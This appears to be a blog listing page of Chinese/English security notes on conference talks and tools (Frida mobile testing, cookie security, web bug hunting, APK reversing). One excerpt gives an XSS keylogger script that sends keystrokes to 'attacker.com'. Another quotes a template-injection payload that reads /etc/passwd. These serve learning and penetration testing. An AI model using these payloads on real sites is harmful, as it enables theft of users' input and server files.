Brida: Advanced Mobile Application Penetration Testing with Frida

Watch on YouTUbe NIN: 讲座是意大利文, 基本上是读 PPT,无 Demo, 可忽略. Slide: PDF (Mirror) 分析 traffic时的各种难度系数: Level 1: 完全没加密. 此时连 certificate 也不用安装 Level 2: HTTPs. 安装 Burp certificate Level 3: SSL + Certitifcate Pinning. 此时需要 SSL KillSwitch 2等的帮助 Level 4: SSL + Certitifcate Pinning + POST data被AES加密. 此时需要知道加密的 Key Level 5: SSL + Certitifcate Pinning…

InfoCon

InfoCon Collection: Hacking Conference Audio and Video Archive…

Cookie Security Myths and Misconceptions - David Johansson - AppSecUSA 2017

Cookies are an integral part of any web application and secure management of cookies is essential to web security. However, during my years as a security consultant I've often encountered various myths and misconceptions regarding cookie security from both developers as well as other security professionals. This talk will dive…

XSS Keylogger

k.js keys = ""; document.onkeypress = function(e){ get = window.event? event:e; key = get.keyCode? get.KeyCode:get.charCode; key = String.fromCharCode(key); keys +=key; } setInterval(function(){ fetch('//attacker.com/k.php?k=' + keys); }, 1000); k.php <?php $k = $_GET["k"]; if(!empty(…

Hunting Security Bugs In Web Apps - Suleman Malik

Watch on YouTube Slide Exploit 1 - Huawei 修改账户信息Endpoint,无需cookie,匿名用户可以任意修改其他用户的信息 Exploit 2 - Intel Angularjs Angular会将{1+1}解释为2,查看Angular有否encode input 以下payload, 将/etc/passwd的内容打印。 {php}$s=file_get_contents('/etc/passwd');var_dump($s);{/php} Exploit 3 - CSRF 尽管有CSRF token,但是将它删除后,replay request,依然接受。 Exploit 4…

YouTube-DL

Usage 接Proxy下载 $ youtube-dl https://youtu.be/Kb56GzQ2pSk --proxy "socks5://127.0.0.1/" [youtube] Kb56GzQ2pSk: Downloading webpage [youtube] Kb56GzQ2pSk: Downloading video info webpage [youtube] Kb56GzQ2pSk: Extracting video information WARNING: unable to extract uploader nickname [youtube] Kb56GzQ2pSk: Downloading MPD manifest [download] Destination: Identity, Authentication + OAuth = OpenID Connect-Kb56GzQ2pSk.webm [download]…

Jon Reeve – Reverse Engineering is not just for hackers

Watch on YouTube Slides aapt // General APK info: $ aapt dump badging myapk.apk // Get strings $ aapt dump strings myapk.apk // Get xml file: $ aapt dump xmltree myapk.apk AndroidManifest.xml adb // List installed packages $ adb shell pm list packages -f -3 // pull package $1 in one line $ adb pull "…

Same Origin Method Execution

Finding Same Origin Method Execution Vulnerabilities | LinkedIn Security - 由浅入深解释了S.O.M.E. Attack的原理. 如果没时间,可以只看该文. Talk 1 - BH 2014 Watch on YouTube. BH Presentation Paper BurpSuite Plugin Talk 2 - 2017 Watch on YouTube Slide Ref Beyond XSS and CSRF: Same Origin Method Execution…